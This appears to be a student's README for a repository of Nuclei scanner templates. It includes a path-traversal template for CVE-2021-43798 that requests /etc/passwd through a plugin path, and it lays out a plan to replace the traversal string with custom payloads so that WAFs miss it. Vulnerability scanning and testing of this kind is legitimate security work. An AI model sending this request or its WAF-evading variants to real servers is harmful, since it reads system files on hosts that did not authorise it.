if U are Nuclei's Templates Contributer , write Your Templates by using HTTP raw format to MAKE THIS REPOSITORY UPDATE e.g.
id:
info:
name:
author:
severity:
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
matchers-condition: and
matchers:
- type: status
status:
-
- type: word
words:
- ""
- ""
condition: and
- type: word
part: header
words:
- ""
Planning
I'm Trying to modify Nuclei's Templates to become MORE Powerful e.g. CVE-2021-43798
id: CVE-2021-43798
info:
name:
author:
severity:
requests:
- method: GET
path:
- "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
I'm gonna Replace ../../../../../../../../../../../../../../../../../../../etc/passwd to {{FILE-unix}}
id: CVE-2021-43798
info:
name:
author:
severity:
requests:
- method: GET
path:
- "{{BaseURL}}/public/plugins/alertlist/{{FILE-unix}}"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
that will help to bypass WAFs by using Custom paylaods because I think all WAFs detect ../../etc/passwd so using ../../etc/passwd is gonna be useless but using Custom paylaods is gonna be useful
Help ME !
these days I'm trying to find junior web penetration testing position but it's must be Remotely Becuase I'm still Student so IF YOU CAN HELP ME , DM on TWITTER